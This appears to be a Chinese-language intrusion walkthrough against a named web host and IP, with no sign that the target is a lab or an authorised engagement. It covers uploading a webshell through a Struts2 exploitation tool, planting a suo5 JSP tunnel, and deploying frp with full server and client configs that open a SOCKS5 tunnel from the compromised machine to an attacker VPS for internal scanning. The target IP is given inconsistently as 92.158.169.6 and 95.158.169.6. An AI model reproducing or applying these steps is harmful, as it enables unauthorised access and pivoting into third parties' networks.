1.suo5
隧道进内网
利用
struts2
检测工具,将我们的
webshell
上传至当前路径下
ip
是
92.158.169.6
,并且该台机器可以出网
根据刚刚上传的
webshell
路径,我们在该路径下上传一个
ttt.jsp(suo5
的马
)
用
suo5
工具连接
http://stil.taxi-burgas.com/ttt.jsp
用
proxy
代理工具新建一个代理,设置为刚刚
suo5
的代理地址和端口
在代理规则里面将我们需要代理的软件添加进去
用
tscan
只扫出来开放了两个端口
systemd-detect-virt
返回的不是
none
,应该是台虚拟机
2.frp
搭建隧道进内网
因为我的这个目标是
linux
系统的,所以下载了
frp_0.58.0_linux_amd64
版本的
frp
对应的文件如下,接下来开始部署
frp
将服务端设置在
vps
上,并且对
frps frps.toml
这两个文件赋予可执行权限
frps.toml
配置文件的具体内容如下
/**************************/
[common]
bind_addr = 0.0.0.0
bind_port = 7800
token = xxxxx(
服务端和客户端的
token
要一致
)
dashboard_addr = 0.0.0.0
dashboard_port = 7500
dashboard_user = xxxxx
dashboard_pwd = xxxxx
/**************************/
然后用
frps -c frps.toml
运行(这个运行因为要加载配置文件,所以后面要加
-c frps.toml
接下来部署客户端
把
frpc.toml
和
frpc
用冰蝎上传至一开始上传
webshell
同级目录下(之前传其他地方都运行不了)
其中
frpc.toml
配置文件具体内容如下
/**************************/
[common]
server_addr = (vps
的公网
ip
地址
)
server_port = 7800
token = xxxxx
protocol = tcp
tls_enable = true
disable_custom_tls_first_byte = true
[socks]
type = tcp
remote_port = 1080
plugin = socks5
plugin_user = admin
plugin_passwd = 530nannan
use_encryption = true
use_compression = true
/**************************/
然后还是同样的先要赋予程序可执行权限
然后运行的时候也要加载
frpc.toml
这个配置文件
在目标机上用
./frpc -c ./frpc.toml
运行客户端以后,我们的服务端就可以看到已经建立完成了
用扫描工具去扫
95.158.169.6